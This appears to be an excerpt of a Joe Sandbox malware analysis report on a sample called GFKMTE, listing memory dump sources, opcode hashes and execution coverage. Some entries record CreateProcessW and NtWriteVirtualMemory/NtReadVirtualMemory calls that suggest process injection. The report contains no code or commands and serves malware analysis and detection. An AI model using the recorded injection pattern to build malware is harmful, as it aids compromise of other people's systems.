                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 993c57384aff5a1bb10ffcf7cecb4d10165cf0f733fabb82d4352e45fb0520ec
                                                                                                                                                  • Instruction ID: 4cd9e339dc44176f26457355d824120347d07cafdb74cb13bac653ea1dd367f7
                                                                                                                                                  • Opcode Fuzzy Hash: 993c57384aff5a1bb10ffcf7cecb4d10165cf0f733fabb82d4352e45fb0520ec
                                                                                                                                                  • Instruction Fuzzy Hash: 0D415C79D06658CFCF14CFA9C8447EEBBF5BF89350F1442A9E805AB261D7709902CB54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3a01e3b85a6222c7e9a4f76402e76d40b987a7c107cb785f9ed7708bca7ad0d4
                                                                                                                                                  • Instruction ID: 64cea78da78ddea9c9ede2eb6e588ef11897479026536d9b380c289d1e5af9c6
                                                                                                                                                  • Opcode Fuzzy Hash: 3a01e3b85a6222c7e9a4f76402e76d40b987a7c107cb785f9ed7708bca7ad0d4
                                                                                                                                                  • Instruction Fuzzy Hash: D6410574D013198FCB14CFA9C584ADDFBF2BF89300F259195D459AB265DB30AE85CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 08ee32006a7aefb1087c8d0998d00d76593f4dad564dfb561a2269f72310403e
                                                                                                                                                  • Instruction ID: 2a87f315882cb248cc7c668341a7bf0dec9f66147d907abc8b2b251c152841db
                                                                                                                                                  • Opcode Fuzzy Hash: 08ee32006a7aefb1087c8d0998d00d76593f4dad564dfb561a2269f72310403e
                                                                                                                                                  • Instruction Fuzzy Hash: 35310778E06618CFDB14CF9AC844AEEBBF5BF89310F0455A9E805BB391D7709902CB54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 12fd3c9504707ea5f1769f68ec3209e04dbb7a0123685986fcab5bd7330ab721
                                                                                                                                                  • Instruction ID: a85ab897e02a7670a642ba2bf5e8134355007361e2b1f8c9d37cd62fc2b9969e
                                                                                                                                                  • Opcode Fuzzy Hash: 12fd3c9504707ea5f1769f68ec3209e04dbb7a0123685986fcab5bd7330ab721
                                                                                                                                                  • Instruction Fuzzy Hash: 38319F74E002098FDB04CFA9D484ADEBBF5BF89301F149266D455BB359D730AA4ACF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f6d42d78a009a84921081c790d7828e79988064a27cad70025f1b51da59aa4ec
                                                                                                                                                  • Instruction ID: a39eb19b9b790a216423e0944e88ccad5938b38ec108490d8ccaee2d0c7dd931
                                                                                                                                                  • Opcode Fuzzy Hash: f6d42d78a009a84921081c790d7828e79988064a27cad70025f1b51da59aa4ec
                                                                                                                                                  • Instruction Fuzzy Hash: 9D311675E0025A9FCB05DFA8D9809DDBBF1FF89310B118696D814BB355D730AA46CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 266f34e20b88779da10a2749d023da80ad94e276952dc506c481d6d5f7c582b0
                                                                                                                                                  • Instruction ID: 136759a8e42082ffab91a9adfbdd24251d5f743680c9778f0c10df98a0dc0533
                                                                                                                                                  • Opcode Fuzzy Hash: 266f34e20b88779da10a2749d023da80ad94e276952dc506c481d6d5f7c582b0
                                                                                                                                                  • Instruction Fuzzy Hash: EB21CE34D0030ACFDB15EFA8F488A9E7BF1FB44314B105695D9006F2A6EB356D8ACB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2516818851.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_157d000_GFKMTE.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 04a27328e431824f1d91ea5da02337682d584f3ff6a0897601df421da307b74a
                                                                                                                                                  • Instruction ID: 92511ae26b228c78ba096162aa752562c1b9c8f666048278579acff4c24ae328
                                                                                                                                                  • Opcode Fuzzy Hash: 04a27328e431824f1d91ea5da02337682d584f3ff6a0897601df421da307b74a
                                                                                                                                                  • Instruction Fuzzy Hash: E801F270C0420AEFCB41EFA8D854A9DBBF0FF05310F1445AAC825AB291EB748A84DB81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3e3f08bf2ccc860aa64ad1f7a3abf386760b7a708bc08091cabec25c3fa0689c
                                                                                                                                                  • Instruction ID: 0dde63eee10a2fcf90b487c719f2000b3c79fdb6ea2b97e20b9c91288756d418
                                                                                                                                                  • Opcode Fuzzy Hash: 3e3f08bf2ccc860aa64ad1f7a3abf386760b7a708bc08091cabec25c3fa0689c
                                                                                                                                                  • Instruction Fuzzy Hash: F8E06571B05104AF8758DA5AE404E6FBBEAFBCD260714C16AF848C7305DB71DC42C790
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cad04c7ddab874b93891d0dbb652907094eb8d63800fd3a931ebe80f01b7e935
                                                                                                                                                  • Instruction ID: f7ade6f79aed8f04f6324c2a2f42602436d0d38e1e246491e58b3a3c27df71c9
                                                                                                                                                  • Opcode Fuzzy Hash: cad04c7ddab874b93891d0dbb652907094eb8d63800fd3a931ebe80f01b7e935
                                                                                                                                                  • Instruction Fuzzy Hash: 12F0B270C01209EFCB54EFB8D544AAEBBF4FB05300F1046AAD825A7394EB709A44DB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e4f1bb244b617ad797d0685394572a0f92c573bebf2d42373925269efb3b7fa
                                                                                                                                                  • Instruction ID: 2acf4bd8e8a2442f5cd0cfa75f58db4d7d8781214b148c8436e1ac887d571b3b
                                                                                                                                                  • Opcode Fuzzy Hash: 5e4f1bb244b617ad797d0685394572a0f92c573bebf2d42373925269efb3b7fa
                                                                                                                                                  • Instruction Fuzzy Hash: B8E0E574E01248CBCB28DF9AE8414ADBBB1FFC8324B109565E015AB264D6309912CB45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 29f329412e9f9b7d3c0f7cc73e02570e58455cef0a4ae46c7f741c0ebdd2bc73
                                                                                                                                                  • Instruction ID: 12b62da6c0148e4c0f77e69f07b4348d3b643993827c1b27ed596ea86a22d24b
                                                                                                                                                  • Opcode Fuzzy Hash: 29f329412e9f9b7d3c0f7cc73e02570e58455cef0a4ae46c7f741c0ebdd2bc73
                                                                                                                                                  • Instruction Fuzzy Hash: A6E04638E0420C9BCB24CF9AD8405DDF772AFC2220F0092A6D499BF254D7308916CB45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  • Opcode ID: 96f4327f8fefebd3a3fcdab1e0c511db4246e6efb0c6592a8f5114cd5648d1fb
                                                                                                                                                  • Instruction ID: b9e81b9151b84e564d64e7b0cc5a25d67e95f6c5a3f8c17ec5cc13380175b956
                                                                                                                                                  • Opcode Fuzzy Hash: 96f4327f8fefebd3a3fcdab1e0c511db4246e6efb0c6592a8f5114cd5648d1fb
                                                                                                                                                  • Instruction Fuzzy Hash: 9D82A474E00228CFCB24CF69D884BDDBBB5BF49304F1486A6D509AB265DB74AE85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e9c3c7937d17a5a4e25dc48d37429d28888308043976d63015a5105e448c12cf
                                                                                                                                                  • Instruction ID: 1a2e460d3e1473c5daf90c3a70db23e5a02f6760fd5b7928ae20a47a2ba1b64d
                                                                                                                                                  • Opcode Fuzzy Hash: e9c3c7937d17a5a4e25dc48d37429d28888308043976d63015a5105e448c12cf
                                                                                                                                                  • Instruction Fuzzy Hash: 6F419C709097858FEB13EF64E8A47887FB1EF42305F0545DAC0458F2A7D778294ACB92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f7348ca18863001766df6b553b84f2eb97167948bb2addf2dccdb9ab8542cd0b
                                                                                                                                                  • Instruction ID: 4bbfb2d78dfbf5153933fd583187b53cd6405f6f610b4661ee48846f360ad927
                                                                                                                                                  • Opcode Fuzzy Hash: f7348ca18863001766df6b553b84f2eb97167948bb2addf2dccdb9ab8542cd0b
                                                                                                                                                  • Instruction Fuzzy Hash: BC216A71E0024A9FCF05DFA9D840ADDBBB1EF49310F8582A6D514BB262DB30A946CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1deefee58ea6c7b44401654dbb31f4586bc6a13dde295cf5c92cae36151bee1e
                                                                                                                                                  • Instruction ID: 1a4caae7e1ff32aa2863f55b75a5381a693c0ecafb623b864813e44c13c27f50
                                                                                                                                                  • Opcode Fuzzy Hash: 1deefee58ea6c7b44401654dbb31f4586bc6a13dde295cf5c92cae36151bee1e
                                                                                                                                                  • Instruction Fuzzy Hash: 88113074D00709DFDB15EF64E884B8D7BB5FB44705F0086A8D1099F269EBB46A4ACF81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 34885a5adde407db64432d0c120c70060e58c8722110fa76accca6138eb3e6ee
                                                                                                                                                  • Instruction ID: 3c1ff5ee3c234ee65ae70f539ea8a65a3dcc59d688b06f646284382e4de2559f
                                                                                                                                                  • Opcode Fuzzy Hash: 34885a5adde407db64432d0c120c70060e58c8722110fa76accca6138eb3e6ee
                                                                                                                                                  • Instruction Fuzzy Hash: 29F044B5D04219DBDF10DFA6D9043EEBBF1AB89310F885065CA14B7251DB7C5A0ADFA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d33f5caa6d46d34e39e12e37c0d22f75035dc9884fd92c257a0e721ef794679
                                                                                                                                                  • Instruction ID: 979f689cc2516b8e534eeae42e647278d6392e785bcc7561cd9ff28bd158c7f1
                                                                                                                                                  • Opcode Fuzzy Hash: 2d33f5caa6d46d34e39e12e37c0d22f75035dc9884fd92c257a0e721ef794679
                                                                                                                                                  • Instruction Fuzzy Hash: 7B013C70804249DFCB16CFA8D85469DBFB1FF06314F1446EED4555B2A2EB355A41CB81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d7187936d9348d38135345338d8c1c2973feabc4fcaaaba49d228d43b037237
                                                                                                                                                  • Instruction ID: d3ad15d3ffd00a7f2df9e3a2ef89c2bd58871cedde082691693ff4ec7fa9ee95
                                                                                                                                                  • Opcode Fuzzy Hash: 2d7187936d9348d38135345338d8c1c2973feabc4fcaaaba49d228d43b037237
                                                                                                                                                  • Instruction Fuzzy Hash: 15F0B770C00209EFCB44DFB8D94069DBBF5FB05300F1046AAD415A7295EB749A44CF80

Execution Graph

Execution Coverage:18.9%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:258
Total number of Limit Nodes:0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ebdfe45f474eb7b80fc888d16f63882a4b715202e946bf7f5f08f0ba52f2a8ee
                                                                                                                                                  • Instruction ID: cebbf92db3fc2bdb11e168d9b431362860c9976bd23b0bb277e7a8bbd8e3265a
                                                                                                                                                  • Opcode Fuzzy Hash: ebdfe45f474eb7b80fc888d16f63882a4b715202e946bf7f5f08f0ba52f2a8ee
                                                                                                                                                  • Instruction Fuzzy Hash: 85125570D053688FEB21EFA8D880BEDBBF1BF49304F1485AAD448AB251DB349985CF55
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 33abfa143ef9b93855ba63a2feef4307754defd2bf937d202eec4d6a852355e7
                                                                                                                                                  • Instruction ID: fc775a91938603f465ee281b1048675c723e5a9ebcb9e466f926a619d49081d4
                                                                                                                                                  • Opcode Fuzzy Hash: 33abfa143ef9b93855ba63a2feef4307754defd2bf937d202eec4d6a852355e7
                                                                                                                                                  • Instruction Fuzzy Hash: BF020174E00228CFDB64EFA9D880BADBBF2FF49304F1485A9E459A7250DB309985CF55
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: c6dd54b1aea4510b99e8898717cf0a9095c33a572840b68942cacf671bdf7ab9
                                                                                                                                                  • Instruction ID: 8c89b10a8d88d5e00674e25776d3024eef120c2b8a91508264451ea12893167f
                                                                                                                                                  • Opcode Fuzzy Hash: c6dd54b1aea4510b99e8898717cf0a9095c33a572840b68942cacf671bdf7ab9
                                                                                                                                                  • Instruction Fuzzy Hash: AA02EF70E00228CFDB64DFA9D880BADBBF1BF49304F1485A9E459B7251DB30AA85CF51
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 323bd15bcf880dc1d2cb1824b2b093a5ce0e12a866e5fe003d895afaa80b75ca
                                                                                                                                                  • Instruction ID: 3cce55e62f6a82ec19473eccb5251894132deb700de81c3d500159ac0360dcfb
                                                                                                                                                  • Opcode Fuzzy Hash: 323bd15bcf880dc1d2cb1824b2b093a5ce0e12a866e5fe003d895afaa80b75ca
                                                                                                                                                  • Instruction Fuzzy Hash: CC02F070E00228CFDB64EFA9D880BADBBF1BF49304F1485AAE459B7251DB309985CF55
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 7c86e410c50822cd33c57e29b0bf904e8021f4d580eca77f4b0e1d6c08c47905
                                                                                                                                                  • Instruction ID: e5369da0dd0441e8807d1ab24fc4b6694f01f711466d5df0e92e850d86bffb74
                                                                                                                                                  • Opcode Fuzzy Hash: 7c86e410c50822cd33c57e29b0bf904e8021f4d580eca77f4b0e1d6c08c47905
                                                                                                                                                  • Instruction Fuzzy Hash: 28F1F070E00228CFEB64DFA9D881BADBBF1BF49304F1485A9E459B7251DB309A81CF54
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 6201afbd0974a4140440c6b13b4611a286246f09de0657e687ffa52de4635ac1
                                                                                                                                                  • Instruction ID: 59ac3815767b5f71f07d638c80b831ce6f106a3aec26b125402d2484404199f6
                                                                                                                                                  • Opcode Fuzzy Hash: 6201afbd0974a4140440c6b13b4611a286246f09de0657e687ffa52de4635ac1
                                                                                                                                                  • Instruction Fuzzy Hash: 7BF1F070E00228CFEB64DFA9D880BADBBF2BF49304F1485A9E459B7251DB309985CF54
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 139b2168b43d7b7159153190f44f8c1828bdf34eef354b0c6cf17b4fd4683d71
                                                                                                                                                  • Instruction ID: 99187709cbfc9c7f005304c9e5b8b3b840d04601e555a4991261052ea0f94b1e
                                                                                                                                                  • Opcode Fuzzy Hash: 139b2168b43d7b7159153190f44f8c1828bdf34eef354b0c6cf17b4fd4683d71
                                                                                                                                                  • Instruction Fuzzy Hash: A6F1F070E00228CFEB64DFA9D880BADBBF1BF49304F1485A9E459B7251DB349985CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 7cff8f88dc037ba368eab24f38597a8594199e198ae780eb53f18de14730ab56
                                                                                                                                                  • Instruction ID: dead41b398221d6f2217df7ae9377925aca8e8d218e30bdc59c7d0237d62b221
                                                                                                                                                  • Opcode Fuzzy Hash: 7cff8f88dc037ba368eab24f38597a8594199e198ae780eb53f18de14730ab56
                                                                                                                                                  • Instruction Fuzzy Hash: 3242E470900259CFEB50EF69C584A8EFBB6BF49311F59C199C448AB212DB30DD89CFA5
                                                                                                                                                  Strings
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0508A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: d38967c887b71ac63b072666bca1467f78bfd69b06dc93dfd192e399ff0ad252
                                                                                                                                                  • Instruction ID: 06f0e25da12f8cff917849f26d311995f98d3e79637c82921bf81975845e5bf5
                                                                                                                                                  • Opcode Fuzzy Hash: d38967c887b71ac63b072666bca1467f78bfd69b06dc93dfd192e399ff0ad252
                                                                                                                                                  • Instruction Fuzzy Hash: 7B41CCB4D012589FCF10DFA9D984AEEFBF1BB49310F10902AE819B7240D739AA46CF54
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0508A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: 39b209e7ccd76b631dd2a338c6e233c417ada2f1f4d32e0eae4fe3ed04380791
                                                                                                                                                  • Instruction ID: 1cb392588c1577ca30312910cf89fe1e958c4df801e79b68d7cccb309ea832be
                                                                                                                                                  • Opcode Fuzzy Hash: 39b209e7ccd76b631dd2a338c6e233c417ada2f1f4d32e0eae4fe3ed04380791
                                                                                                                                                  • Instruction Fuzzy Hash: 0641BBB4D012589FCF10DFA9D984AEEFBF1BB49310F24902AE815B7240D779AA45CF54
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 05089D52
                                                                                                                                                  Memory Dump Source
